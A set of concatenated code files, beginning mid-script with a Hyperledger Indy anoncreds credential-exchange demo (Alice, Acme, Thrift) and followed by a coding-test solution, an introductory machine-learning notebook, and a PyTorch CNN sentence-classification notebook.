cred_for_attr3['referent']: cred_for_attr3,
cred_for_attr4['referent']: cred_for_attr4,
cred_for_attr5['referent']: cred_for_attr5,
cred_for_predicate1['referent']: cred_for_predicate1}
schemas_json, cred_defs_json, revoc_states_json = \
await prover_get_entities_from_ledger(pool_handle, alice_faber_did, creds_for_job_application_proof, 'Alice')
print("\"Alice\" -> Create \"Job-Application\" Proof")
job_application_requested_creds_json = json.dumps({
'self_attested_attributes': {
'attr1_referent': 'Alice',
'attr2_referent': 'Garcia',
'attr6_referent': '123-45-6789'
},
'requested_attributes': {
'attr3_referent': {'cred_id': cred_for_attr3['referent'], 'revealed': True},
'attr4_referent': {'cred_id': cred_for_attr4['referent'], 'revealed': True},
'attr5_referent': {'cred_id': cred_for_attr5['referent'], 'revealed': True},
},
'requested_predicates': {'predicate1_referent': {'cred_id': cred_for_predicate1['referent']}}
})
job_application_proof_json = \
await anoncreds.prover_create_proof(alice_wallet, authdecrypted_job_application_proof_request_json,
job_application_requested_creds_json, alice_master_secret_id,
schemas_json, cred_defs_json, revoc_states_json)
print("\"Alice\" -> Authcrypt \"Job-Application\" Proof for Acme")
authcrypted_job_application_proof_json = await crypto.auth_crypt(alice_wallet, alice_acme_key, acme_alice_verkey,
job_application_proof_json.encode('utf-8'))
print("\"Alice\" -> Send authcrypted \"Job-Application\" Proof to Acme")
print("\"Acme\" -> Authdecrypted \"Job-Application\" Proof from Alice")
_, decrypted_job_application_proof_json, decrypted_job_application_proof = \
await auth_decrypt(acme_wallet, acme_alice_key, authcrypted_job_application_proof_json)
schemas_json, cred_defs_json, revoc_ref_defs_json, revoc_regs_json = \
await verifier_get_entities_from_ledger(pool_handle, acme_did,
decrypted_job_application_proof['identifiers'], 'Acme')
print("\"Acme\" -> Verify \"Job-Application\" Proof from Alice")
assert 'Bachelor of Science, Marketing' == \
decrypted_job_application_proof['requested_proof']['revealed_attrs']['attr3_referent']['raw']
assert 'graduated' == \
decrypted_job_application_proof['requested_proof']['revealed_attrs']['attr4_referent']['raw']
assert '123-45-6789' == \
decrypted_job_application_proof['requested_proof']['revealed_attrs']['attr5_referent']['raw']
assert 'Alice' == decrypted_job_application_proof['requested_proof']['self_attested_attrs']['attr1_referent']
assert 'Garcia' == decrypted_job_application_proof['requested_proof']['self_attested_attrs']['attr2_referent']
assert '123-45-6789' == decrypted_job_application_proof['requested_proof']['self_attested_attrs']['attr6_referent']
assert await anoncreds.verifier_verify_proof(job_application_proof_request_json,
decrypted_job_application_proof_json,
schemas_json, cred_defs_json, revoc_ref_defs_json, revoc_regs_json)
print("==============================")
print("== Apply for the job with Acme - Getting Job-Certificate Credential ==")
print("------------------------------")
print("\"Acme\" -> Create \"Job-Certificate\" Credential Offer for Alice")
job_certificate_cred_offer_json = \
await anoncreds.issuer_create_credential_offer(acme_wallet, acme_job_certificate_cred_def_id)
print("\"Acme\" -> Get key for Alice did")
alice_acme_verkey = await did.key_for_did(pool_handle, acme_wallet, acme_alice_connection_response['did'])
print("\"Acme\" -> Authcrypt \"Job-Certificate\" Credential Offer for Alice")
authcrypted_job_certificate_cred_offer = await crypto.auth_crypt(acme_wallet, acme_alice_key, alice_acme_verkey,
job_certificate_cred_offer_json.encode('utf-8'))
print("\"Acme\" -> Send authcrypted \"Job-Certificate\" Credential Offer to Alice")
print("\"Alice\" -> Authdecrypted \"Job-Certificate\" Credential Offer from Acme")
acme_alice_verkey, authdecrypted_job_certificate_cred_offer_json, authdecrypted_job_certificate_cred_offer = \
await auth_decrypt(alice_wallet, alice_acme_key, authcrypted_job_certificate_cred_offer)
print("\"Alice\" -> Get \"Acme Job-Certificate\" Credential Definition from Ledger")
(_, acme_job_certificate_cred_def) = \
await get_cred_def(pool_handle, alice_acme_did, authdecrypted_job_certificate_cred_offer['cred_def_id'])
print("\"Alice\" -> Create and store in Wallet \"Job-Certificate\" Credential Request for Acme")
(job_certificate_cred_request_json, job_certificate_cred_request_metadata_json) = \
await anoncreds.prover_create_credential_req(alice_wallet, alice_acme_did,
authdecrypted_job_certificate_cred_offer_json,
acme_job_certificate_cred_def, alice_master_secret_id)
print("\"Alice\" -> Authcrypt \"Job-Certificate\" Credential Request for Acme")
authcrypted_job_certificate_cred_request_json = \
await crypto.auth_crypt(alice_wallet, alice_acme_key, acme_alice_verkey,
job_certificate_cred_request_json.encode('utf-8'))
print("\"Alice\" -> Send authcrypted \"Job-Certificate\" Credential Request to Acme")
print("\"Acme\" -> Authdecrypt \"Job-Certificate\" Credential Request from Alice")
alice_acme_verkey, authdecrypted_job_certificate_cred_request_json, _ = \
await auth_decrypt(acme_wallet, acme_alice_key, authcrypted_job_certificate_cred_request_json)
print("\"Acme\" -> Create \"Job-Certificate\" Credential for Alice")
alice_job_certificate_cred_values_json = json.dumps({
"first_name": {"raw": "Alice", "encoded": "245712572474217942457235975012103335"},
"last_name": {"raw": "Garcia", "encoded": "312643218496194691632153761283356127"},
"employee_status": {"raw": "Permanent", "encoded": "2143135425425143112321314321"},
"salary": {"raw": "2400", "encoded": "2400"},
"experience": {"raw": "10", "encoded": "10"}
})
job_certificate_cred_json, _, _ = \
await anoncreds.issuer_create_credential(acme_wallet, job_certificate_cred_offer_json,
authdecrypted_job_certificate_cred_request_json,
alice_job_certificate_cred_values_json, None, None)
print("\"Acme\" -> Authcrypt \"Job-Certificate\" Credential for Alice")
authcrypted_job_certificate_cred_json = \
await crypto.auth_crypt(acme_wallet, acme_alice_key, alice_acme_verkey,
job_certificate_cred_json.encode('utf-8'))
print("\"Acme\" -> Send authcrypted \"Job-Certificate\" Credential to Alice")
print("\"Alice\" -> Authdecrypted \"Job-Certificate\" Credential from Acme")
_, authdecrypted_job_certificate_cred_json, _ = \
await auth_decrypt(alice_wallet, alice_acme_key, authcrypted_job_certificate_cred_json)
print("\"Alice\" -> Store \"Job-Certificate\" Credential")
await anoncreds.prover_store_credential(alice_wallet, None, job_certificate_cred_request_metadata_json,
authdecrypted_job_certificate_cred_json,
acme_job_certificate_cred_def_json, None)
print("==============================")
print("=== Apply for the loan with Thrift ==")
print("==============================")
print("== Apply for the loan with Thrift - Onboarding ==")
print("------------------------------")
_, thrift_alice_key, alice_thrift_did, alice_thrift_key, \
thrift_alice_connection_response = await onboarding(pool_handle, pool_name, "Thrift", thrift_wallet, thrift_did,
"Alice", alice_wallet, alice_wallet_name,
alice_wallet_credentials)
print("==============================")
print("== Apply for the loan with Thrift - Job-Certificate proving ==")
print("------------------------------")
print("\"Thrift\" -> Create \"Loan-Application-Basic\" Proof Request")
apply_loan_proof_request_json = json.dumps({
'nonce': '123432421212',
'name': 'Loan-Application-Basic',
'version': '0.1',
'requested_attributes': {
'attr1_referent': {
'name': 'employee_status',
'restrictions': [{'cred_def_id': acme_job_certificate_cred_def_id}]
}
},
'requested_predicates': {
'predicate1_referent': {
'name': 'salary',
'p_type': '>=',
'p_value': 2000,
'restrictions': [{'cred_def_id': acme_job_certificate_cred_def_id}]
},
'predicate2_referent': {
'name': 'experience',
'p_type': '>=',
'p_value': 1,
'restrictions': [{'cred_def_id': acme_job_certificate_cred_def_id}]
}
}
})
print("\"Thrift\" -> Get key for Alice did")
alice_thrift_verkey = await did.key_for_did(pool_handle, thrift_wallet, thrift_alice_connection_response['did'])
print("\"Thrift\" -> Authcrypt \"Loan-Application-Basic\" Proof Request for Alice")
authcrypted_apply_loan_proof_request_json = \
await crypto.auth_crypt(thrift_wallet, thrift_alice_key, alice_thrift_verkey,
apply_loan_proof_request_json.encode('utf-8'))
print("\"Thrift\" -> Send authcrypted \"Loan-Application-Basic\" Proof Request to Alice")
print("\"Alice\" -> Authdecrypt \"Loan-Application-Basic\" Proof Request from Thrift")
thrift_alice_verkey, authdecrypted_apply_loan_proof_request_json, _ = \
await auth_decrypt(alice_wallet, alice_thrift_key, authcrypted_apply_loan_proof_request_json)
print("\"Alice\" -> Get credentials for \"Loan-Application-Basic\" Proof Request")
creds_json_for_apply_loan_proof_request = \
await anoncreds.prover_get_credentials_for_proof_req(alice_wallet, authdecrypted_apply_loan_proof_request_json)
creds_for_apply_loan_proof_request = json.loads(creds_json_for_apply_loan_proof_request)
cred_for_attr1 = creds_for_apply_loan_proof_request['attrs']['attr1_referent'][0]['cred_info']
cred_for_predicate1 = creds_for_apply_loan_proof_request['predicates']['predicate1_referent'][0]['cred_info']
cred_for_predicate2 = creds_for_apply_loan_proof_request['predicates']['predicate2_referent'][0]['cred_info']
creds_for_apply_loan_proof = {cred_for_attr1['referent']: cred_for_attr1,
cred_for_predicate1['referent']: cred_for_predicate1,
cred_for_predicate2['referent']: cred_for_predicate2}
schemas_json, cred_defs_json, revoc_states_json = \
await prover_get_entities_from_ledger(pool_handle, alice_thrift_did, creds_for_apply_loan_proof, 'Alice')
print("\"Alice\" -> Create \"Loan-Application-Basic\" Proof")
apply_loan_requested_creds_json = json.dumps({
'self_attested_attributes': {},
'requested_attributes': {
'attr1_referent': {'cred_id': cred_for_attr1['referent'], 'revealed': True}
},
'requested_predicates': {
'predicate1_referent': {'cred_id': cred_for_predicate1['referent']},
'predicate2_referent': {'cred_id': cred_for_predicate2['referent']}
}
})
alice_apply_loan_proof_json = \
await anoncreds.prover_create_proof(alice_wallet, authdecrypted_apply_loan_proof_request_json,
apply_loan_requested_creds_json, alice_master_secret_id, schemas_json,
cred_defs_json, revoc_states_json)
print("\"Alice\" -> Authcrypt \"Loan-Application-Basic\" Proof for Thrift")
authcrypted_alice_apply_loan_proof_json = \
await crypto.auth_crypt(alice_wallet, alice_thrift_key, thrift_alice_verkey,
alice_apply_loan_proof_json.encode('utf-8'))
print("\"Alice\" -> Send authcrypted \"Loan-Application-Basic\" Proof to Thrift")
print("\"Thrift\" -> Authdecrypted \"Loan-Application-Basic\" Proof from Alice")
_, authdecrypted_alice_apply_loan_proof_json, authdecrypted_alice_apply_loan_proof = \
await auth_decrypt(thrift_wallet, thrift_alice_key, authcrypted_alice_apply_loan_proof_json)
print("\"Thrift\" -> Get Schemas, Credential Definitions and Revocation Registries from Ledger"
" required for Proof verifying")
schemas_json, cred_defs_json, revoc_defs_json, revoc_regs_json = \
await verifier_get_entities_from_ledger(pool_handle, thrift_did,
authdecrypted_alice_apply_loan_proof['identifiers'], 'Thrift')
print("\"Thrift\" -> Verify \"Loan-Application-Basic\" Proof from Alice")
assert 'Permanent' == \
authdecrypted_alice_apply_loan_proof['requested_proof']['revealed_attrs']['attr1_referent']['raw']
assert await anoncreds.verifier_verify_proof(apply_loan_proof_request_json,
authdecrypted_alice_apply_loan_proof_json,
schemas_json, cred_defs_json, revoc_defs_json, revoc_regs_json)
print("==============================")
print("==============================")
print("== Apply for the loan with Thrift - Transcript and Job-Certificate proving ==")
print("------------------------------")
print("\"Thrift\" -> Create \"Loan-Application-KYC\" Proof Request")
apply_loan_kyc_proof_request_json = json.dumps({
'nonce': '123432421212',
'name': 'Loan-Application-KYC',
'version': '0.1',
'requested_attributes': {
'attr1_referent': {'name': 'first_name'},
'attr2_referent': {'name': 'last_name'},
'attr3_referent': {'name': 'ssn'}
},
'requested_predicates': {}
})
print("\"Thrift\" -> Get key for Alice did")
alice_thrift_verkey = await did.key_for_did(pool_handle, thrift_wallet, thrift_alice_connection_response['did'])
print("\"Thrift\" -> Authcrypt \"Loan-Application-KYC\" Proof Request for Alice")
authcrypted_apply_loan_kyc_proof_request_json = \
await crypto.auth_crypt(thrift_wallet, thrift_alice_key, alice_thrift_verkey,
apply_loan_kyc_proof_request_json.encode('utf-8'))
print("\"Thrift\" -> Send authcrypted \"Loan-Application-KYC\" Proof Request to Alice")
print("\"Alice\" -> Authdecrypt \"Loan-Application-KYC\" Proof Request from Thrift")
thrift_alice_verkey, authdecrypted_apply_loan_kyc_proof_request_json, _ = \
await auth_decrypt(alice_wallet, alice_thrift_key, authcrypted_apply_loan_kyc_proof_request_json)
print("\"Alice\" -> Get credentials for \"Loan-Application-KYC\" Proof Request")
creds_json_for_apply_loan_kyc_proof_request = \
await anoncreds.prover_get_credentials_for_proof_req(alice_wallet,
authdecrypted_apply_loan_kyc_proof_request_json)
creds_for_apply_loan_kyc_proof_request = json.loads(creds_json_for_apply_loan_kyc_proof_request)
cred_for_attr1 = creds_for_apply_loan_kyc_proof_request['attrs']['attr1_referent'][0]['cred_info']
cred_for_attr2 = creds_for_apply_loan_kyc_proof_request['attrs']['attr2_referent'][0]['cred_info']
cred_for_attr3 = creds_for_apply_loan_kyc_proof_request['attrs']['attr3_referent'][0]['cred_info']
creds_for_apply_loan_kyc_proof = {cred_for_attr1['referent']: cred_for_attr1,
cred_for_attr2['referent']: cred_for_attr2,
cred_for_attr3['referent']: cred_for_attr3}
schemas_json, cred_defs_json, revoc_states_json = \
await prover_get_entities_from_ledger(pool_handle, alice_thrift_did, creds_for_apply_loan_kyc_proof, 'Alice')
print("\"Alice\" -> Create \"Loan-Application-KYC\" Proof")
apply_loan_kyc_requested_creds_json = json.dumps({
'self_attested_attributes': {},
'requested_attributes': {
'attr1_referent': {'cred_id': cred_for_attr1['referent'], 'revealed': True},
'attr2_referent': {'cred_id': cred_for_attr2['referent'], 'revealed': True},
'attr3_referent': {'cred_id': cred_for_attr3['referent'], 'revealed': True}
},
'requested_predicates': {}
})
alice_apply_loan_kyc_proof_json = \
await anoncreds.prover_create_proof(alice_wallet, authdecrypted_apply_loan_kyc_proof_request_json,
apply_loan_kyc_requested_creds_json, alice_master_secret_id,
schemas_json, cred_defs_json, revoc_states_json)
print("\"Alice\" -> Authcrypt \"Loan-Application-KYC\" Proof for Thrift")
authcrypted_alice_apply_loan_kyc_proof_json = \
await crypto.auth_crypt(alice_wallet, alice_thrift_key, thrift_alice_verkey,
alice_apply_loan_kyc_proof_json.encode('utf-8'))
print("\"Alice\" -> Send authcrypted \"Loan-Application-KYC\" Proof to Thrift")
print("\"Thrift\" -> Authdecrypted \"Loan-Application-KYC\" Proof from Alice")
_, authdecrypted_alice_apply_loan_kyc_proof_json, authdecrypted_alice_apply_loan_kyc_proof = \
await auth_decrypt(thrift_wallet, thrift_alice_key, authcrypted_alice_apply_loan_kyc_proof_json)
print("\"Thrift\" -> Get Schemas, Credential Definitions and Revocation Registries from Ledger"
" required for Proof verifying")
schemas_json, cred_defs_json, revoc_defs_json, revoc_regs_json = \
await verifier_get_entities_from_ledger(pool_handle, thrift_did,
authdecrypted_alice_apply_loan_kyc_proof['identifiers'], 'Thrift')
print("\"Thrift\" -> Verify \"Loan-Application-KYC\" Proof from Alice")
assert 'Alice' == \
authdecrypted_alice_apply_loan_kyc_proof['requested_proof']['revealed_attrs']['attr1_referent']['raw']
assert 'Garcia' == \
authdecrypted_alice_apply_loan_kyc_proof['requested_proof']['revealed_attrs']['attr2_referent']['raw']
assert '123-45-6789' == \
authdecrypted_alice_apply_loan_kyc_proof['requested_proof']['revealed_attrs']['attr3_referent']['raw']
assert await anoncreds.verifier_verify_proof(apply_loan_kyc_proof_request_json,
authdecrypted_alice_apply_loan_kyc_proof_json,
schemas_json, cred_defs_json, revoc_defs_json, revoc_regs_json)
print("==============================")
print(" \"Sovrin Steward\" -> Close and Delete wallet")
await wallet.close_wallet(steward_wallet)
await wallet.delete_wallet(steward_wallet_name, steward_wallet_credentials)
print("\"Government\" -> Close and Delete wallet")
await wallet.close_wallet(government_wallet)
await wallet.delete_wallet(government_wallet_name, government_wallet_credentials)
print("\"Faber\" -> Close and Delete wallet")
await wallet.close_wallet(faber_wallet)
await wallet.delete_wallet(faber_wallet_name, faber_wallet_credentials)
print("\"Acme\" -> Close and Delete wallet")
await wallet.close_wallet(acme_wallet)
await wallet.delete_wallet(acme_wallet_name, acme_wallet_credentials)
print("\"Thrift\" -> Close and Delete wallet")
await wallet.close_wallet(thrift_wallet)
await wallet.delete_wallet(thrift_wallet_name, thrift_wallet_credentials)
print("\"Alice\" -> Close and Delete wallet")
await wallet.close_wallet(alice_wallet)
await wallet.delete_wallet(alice_wallet_name, alice_wallet_credentials)
print("Close and Delete pool")
await pool.close_pool_ledger(pool_handle)
await pool.delete_pool_ledger_config(pool_name)
print("Getting started -> done")
async def onboarding(pool_handle, pool_name, _from, from_wallet, from_did, to,
to_wallet: Optional[str], to_wallet_name: str, to_wallet_credentials: str):
print("\"{}\" -> Create and store in Wallet \"{} {}\" DID".format(_from, _from, to))
(from_to_did, from_to_key) = await did.create_and_store_my_did(from_wallet, "{}")
print("\"{}\" -> Send Nym to Ledger for \"{} {}\" DID".format(_from, _from, to))
await send_nym(pool_handle, from_wallet, from_did, from_to_did, from_to_key, None)
print("\"{}\" -> Send connection request to {} with \"{} {}\" DID and nonce".format(_from, to, _from, to))
connection_request = {
'did': from_to_did,
'nonce': 123456789
}
if not to_wallet:
print("\"{}\" -> Create wallet".format(to))
try:
await wallet.create_wallet(pool_name, to_wallet_name, None, None, to_wallet_credentials)
except IndyError as ex:
if ex.error_code == ErrorCode.PoolLedgerConfigAlreadyExistsError:
pass
to_wallet = await wallet.open_wallet(to_wallet_name, None, to_wallet_credentials)
print("\"{}\" -> Create and store in Wallet \"{} {}\" DID".format(to, to, _from))
(to_from_did, to_from_key) = await did.create_and_store_my_did(to_wallet, "{}")
print("\"{}\" -> Get key for did from \"{}\" connection request".format(to, _from))
from_to_verkey = await did.key_for_did(pool_handle, to_wallet, connection_request['did'])
print("\"{}\" -> Anoncrypt connection response for \"{}\" with \"{} {}\" DID, verkey and nonce"
.format(to, _from, to, _from))
connection_response = json.dumps({
'did': to_from_did,
'verkey': to_from_key,
'nonce': connection_request['nonce']
})
anoncrypted_connection_response = await crypto.anon_crypt(from_to_verkey, connection_response.encode('utf-8'))
print("\"{}\" -> Send anoncrypted connection response to \"{}\"".format(to, _from))
print("\"{}\" -> Anondecrypt connection response from \"{}\"".format(_from, to))
decrypted_connection_response = \
json.loads((await crypto.anon_decrypt(from_wallet, from_to_key,
anoncrypted_connection_response)).decode("utf-8"))
print("\"{}\" -> Authenticates \"{}\" by comparision of Nonce".format(_from, to))
assert connection_request['nonce'] == decrypted_connection_response['nonce']
print("\"{}\" -> Send Nym to Ledger for \"{} {}\" DID".format(_from, to, _from))
await send_nym(pool_handle, from_wallet, from_did, to_from_did, to_from_key, None)
return to_wallet, from_to_key, to_from_did, to_from_key, decrypted_connection_response
async def get_verinym(pool_handle, _from, from_wallet, from_did, from_to_key,
to, to_wallet, to_from_did, to_from_key, role):
print("\"{}\" -> Create and store in Wallet \"{}\" new DID".format(to, to))
(to_did, to_key) = await did.create_and_store_my_did(to_wallet, "{}")
print("\"{}\" -> Authcrypt \"{} DID info\" for \"{}\"".format(to, to, _from))
did_info_json = json.dumps({
'did': to_did,
'verkey': to_key
})
authcrypted_did_info_json = \
await crypto.auth_crypt(to_wallet, to_from_key, from_to_key, did_info_json.encode('utf-8'))
print("\"{}\" -> Send authcrypted \"{} DID info\" to {}".format(to, to, _from))
print("\"{}\" -> Authdecrypted \"{} DID info\" from {}".format(_from, to, to))
sender_verkey, authdecrypted_did_info_json, authdecrypted_did_info = \
await auth_decrypt(from_wallet, from_to_key, authcrypted_did_info_json)
print("\"{}\" -> Authenticate {} by comparision of Verkeys".format(_from, to, ))
assert sender_verkey == await did.key_for_did(pool_handle, from_wallet, to_from_did)
print("\"{}\" -> Send Nym to Ledger for \"{} DID\" with {} Role".format(_from, to, role))
await send_nym(pool_handle, from_wallet, from_did, authdecrypted_did_info['did'],
authdecrypted_did_info['verkey'], role)
return to_did
async def send_nym(pool_handle, wallet_handle, _did, new_did, new_key, role):
nym_request = await ledger.build_nym_request(_did, new_did, new_key, None, role)
await ledger.sign_and_submit_request(pool_handle, wallet_handle, _did, nym_request)
async def send_schema(pool_handle, wallet_handle, _did, schema):
schema_request = await ledger.build_schema_request(_did, schema)
await ledger.sign_and_submit_request(pool_handle, wallet_handle, _did, schema_request)
async def send_cred_def(pool_handle, wallet_handle, _did, cred_def_json):
cred_def_request = await ledger.build_cred_def_request(_did, cred_def_json)
await ledger.sign_and_submit_request(pool_handle, wallet_handle, _did, cred_def_request)
async def get_schema(pool_handle, _did, schema_id):
get_schema_request = await ledger.build_get_schema_request(_did, schema_id)
get_schema_response = await ledger.submit_request(pool_handle, get_schema_request)
return await ledger.parse_get_schema_response(get_schema_response)
async def get_cred_def(pool_handle, _did, schema_id):
get_cred_def_request = await ledger.build_get_cred_def_request(_did, schema_id)
get_cred_def_response = await ledger.submit_request(pool_handle, get_cred_def_request)
return await ledger.parse_get_cred_def_response(get_cred_def_response)
async def prover_get_entities_from_ledger(pool_handle, _did, identifiers, actor):
schemas = {}
cred_defs = {}
rev_states = {}
for item in identifiers.values():
print("\"{}\" -> Get Schema from Ledger".format(actor))
(received_schema_id, received_schema) = await get_schema(pool_handle, _did, item['schema_id'])
schemas[received_schema_id] = json.loads(received_schema)
print("\"{}\" -> Get Credential Definition from Ledger".format(actor))
(received_cred_def_id, received_cred_def) = await get_cred_def(pool_handle, _did, item['cred_def_id'])
cred_defs[received_cred_def_id] = json.loads(received_cred_def)
if 'rev_reg_seq_no' in item:
pass # TODO Create Revocation States
return json.dumps(schemas), json.dumps(cred_defs), json.dumps(rev_states)
async def verifier_get_entities_from_ledger(pool_handle, _did, identifiers, actor):
schemas = {}
cred_defs = {}
rev_reg_defs = {}
rev_regs = {}
for item in identifiers:
print("\"{}\" -> Get Schema from Ledger".format(actor))
(received_schema_id, received_schema) = await get_schema(pool_handle, _did, item['schema_id'])
schemas[received_schema_id] = json.loads(received_schema)
print("\"{}\" -> Get Credential Definition from Ledger".format(actor))
(received_cred_def_id, received_cred_def) = await get_cred_def(pool_handle, _did, item['cred_def_id'])
cred_defs[received_cred_def_id] = json.loads(received_cred_def)
if 'rev_reg_seq_no' in item:
pass # TODO Get Revocation Definitions and Revocation Registries
return json.dumps(schemas), json.dumps(cred_defs), json.dumps(rev_reg_defs), json.dumps(rev_regs)
async def auth_decrypt(wallet_handle, key, message):
from_verkey, decrypted_message_json = await crypto.auth_decrypt(wallet_handle, key, message)
decrypted_message_json = decrypted_message_json.decode("utf-8")
decrypted_message = json.loads(decrypted_message_json)
return from_verkey, decrypted_message_json, decrypted_message
if __name__ == '__main__':
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(run())
time.sleep(1) # FIXME waiting for libindy thread complete
# -
| 46,177 |
/SWEA/(2020.10.10)1859_백만장자프로젝트_D2.ipynb
|
bec9b0b332f0fa5478e81f66d9e508fb79710b27
|
[] |
no_license
|
HYEEWON/practice_for_coding_test_hyewon
|
https://github.com/HYEEWON/practice_for_coding_test_hyewon
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,110 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: py1
# language: python
# name: py1
# ---
T = int(input())
for t in range(1, T+1):
N = int(input())
price = list(map(int, input().split()))
max_price = price[-1]
money = 0
for i in range(N-2, -1, -1):
if max_price > price[i]:
money += max_price - price[i]
else:
max_price = price[i]
print('#'+str(t)+' '+ str(money))
| 601 |
/1.Introduction to machine learning/2.What_is_Machine_Learning.ipynb
|
327fb0ed6c3c5686c574916a3341e44157f08716
|
[] |
no_license
|
AnshuTrivedi/Microsoft-Scholarship-Foundation-course-Nanodegree-Program
|
https://github.com/AnshuTrivedi/Microsoft-Scholarship-Foundation-course-Nanodegree-Program
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 75,606 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# **Machine learning is a data science technique used to extract patterns from data, allowing computers to identify related data, and forecast future outcomes, behaviors, and trends.**
# * One important component of machine learning is that we are `taking some data and using it to make predictions or identify important relationships`.
# ## Traditional programming
from IPython.display import Image
Image(filename='traditional-programming.png')
# ## Machine Learning
Image(filename='machine-learning.png')
# ### Question 1
#
# Imagine you want to create a function that multiplies two numbers together (e.g., given the inputs 2 and 3, the function will generate the output 6).
#
# What approach is best suited to this problem?
# **`Traditional programming is well-suited to a problem like this, in which you are given the data (two numbers) and already know the the rules (multiplication) for getting the desired output`**.
# ### Question 2
#
# Now imagine that you have some images that contain handwritten numbers. You want to create a program that will recognize which number is in each picture, but you're not sure exactly what characteristics can be used to best tell the numbers apart.
#
# Which is the best approach for creating this program?
# **`Machine learning is well suited to problems like this, in which you have the data (images) and the answers (you know which images have which numbers), but it's unclear what the rules are.`**
# Mark all of the options below that are true statements about machine learning.
#
# 1. Data is input to train an algorithm
# 2. Historical answers are input to train an algorithm
# 3. Rules are the output learned by the algorithm
| 1,953 |
/model.ipynb
|
9610c19043c366befbd598d12c34a91dcaef5e4b
|
[] |
no_license
|
qlv1/11747-HW1
|
https://github.com/qlv1/11747-HW1
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 45,272 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# From PyTorch CNN offical tutorial
import torch
import torch.nn.functional as F
import torch.nn as nn
import torch.utils.data
import numpy as np
import pandas as pd
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv1d(50, 100, 3)
self.conv2 = nn.Conv1d(50, 100, 4)
self.conv3 = nn.Conv1d(50, 100, 5)
self.pool = nn.MaxPool1d(60)
self.dropout = nn.Dropout(p=0.5)
self.fc1 = nn.Linear(300, 16)
def forward(self, x):
x1 = self.pool(F.relu(self.conv1(x)))
x2 = self.pool(F.relu(self.conv2(x)))
x3 = self.pool(F.relu(self.conv3(x)))
x = torch.cat((x1, x2, x3), dim = 1).squeeze()
x = self.dropout(x)
x = self.fc1(x)
return x
net = Net().to(device)
# +
class Net_dynamic(nn.Module):
def __init__(self):
super(Net_dynamic, self).__init__()
self.emb = nn.Linear(50, 50)
self.conv1 = nn.Conv1d(50, 100, 3)
self.conv2 = nn.Conv1d(50, 100, 4)
self.conv3 = nn.Conv1d(50, 100, 5)
self.pool = nn.MaxPool1d(60)
self.dropout = nn.Dropout(p=0.5)
self.fc1 = nn.Linear(300, 16)
def forward(self, x):
x = x.transpose(1, 2)
x = self.emb(x)
x = x.transpose(1, 2)
x1 = self.pool(F.relu(self.conv1(x)))
x2 = self.pool(F.relu(self.conv2(x)))
x3 = self.pool(F.relu(self.conv3(x)))
x = torch.cat((x1, x2, x3), dim = 1).squeeze()
x = self.dropout(x)
x = self.fc1(x)
return x
net_2 = Net_dynamic().to(device)
# +
class Net_dual(nn.Module):
def __init__(self):
super(Net_dual, self).__init__()
self.emb = nn.Linear(50, 50)
self.conv1 = nn.Conv1d(100, 100, 3)
self.conv2 = nn.Conv1d(100, 100, 4)
self.conv3 = nn.Conv1d(100, 100, 5)
self.pool = nn.MaxPool1d(60)
self.dropout = nn.Dropout(p=0.5)
self.fc1 = nn.Linear(300, 16)
def forward(self, x):
x_emb = self.emb(x.transpose(1, 2)).transpose(1, 2)
x = torch.cat((x, x_emb), dim = 1)
x1 = self.pool(F.relu(self.conv1(x)))
x2 = self.pool(F.relu(self.conv2(x)))
x3 = self.pool(F.relu(self.conv3(x)))
x = torch.cat((x1, x2, x3), dim = 1).squeeze()
x = self.dropout(x)
x = self.fc1(x)
return x
net_3 = Net_dual().to(device)
# +
label_train = list(set(list(np.load('D:/Courses/11747/label_train.npy'))))
label_dict = dict()
for idx, key in enumerate(label_train):
label_dict[key] = idx
# add hard coding for mislabel
label_dict['Media and darama'] = label_dict['Media and drama']
print (label_dict)
label_list = list(label_dict.keys())
print (label_list)
# +
# From PyTorch dataloader offical tutorial
class Sentence():
"""sentence classification dataset."""
def __init__(self, dataset_dir, label_dir):
# reshaping data from (N, length, channel) to (N, channel, length)
self.data = torch.from_numpy(np.load(dataset_dir)).transpose(1, 2).float().to(device)
# reading raw label data, transform to integer value using dict
label_list = np.load(label_dir)
self.labels = torch.zeros(self.data.shape[0]).to(device)
for i in range(len(self.labels)):
try:
self.labels[i] = label_dict[label_list[i]]
except:
pass
print (self.data.shape, self.labels.shape)
def __len__(self):
return len(self.labels)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
data = self.data[idx]
label = self.labels[idx]
sample = {'data': data, 'label': label}
return sample
# -
dataset_train = Sentence('D:/Courses/11747/data_train.npy', 'D:/Courses/11747/label_train.npy')
dataset_val = Sentence('D:/Courses/11747/data_val.npy', 'D:/Courses/11747/label_val.npy')
dataset_test = Sentence('D:/Courses/11747/data_test.npy', 'D:/Courses/11747/label_test.npy')
train_loader = torch.utils.data.DataLoader(dataset_train, batch_size=32,
shuffle=False, num_workers=0)
val_loader = torch.utils.data.DataLoader(dataset_val, batch_size=32,
shuffle=False, num_workers=0)
test_loader = torch.utils.data.DataLoader(dataset_test, batch_size=32,
shuffle=False, num_workers=0)
def eval(model, model_name):
model.eval()
err = 0
running_loss = 0.0
all_pred = []
for i, data in enumerate(val_loader):
# get the inputs; data is a list of [inputs, labels]
inputs = data['data']
labels = data['label'].long()
# forward + backward + optimize
outputs = model(inputs)
pred = torch.argmax(outputs, dim = 1)
all_pred += pred.tolist()
err += torch.nonzero(labels - pred).size(0)
loss = criterion(outputs, labels)
# print statistics
running_loss += loss.item()
if i % 2000 == 1999: # print every 2000 mini-batches
print('[%d, %5d / %d] loss: %.3f' %
(epoch + 1, i + 1, len(trainloader), running_loss / 2000))
running_loss = 0.0
# calculating accuracy
accu = 1 - err/dataset_val.__len__()
print (len(all_pred))
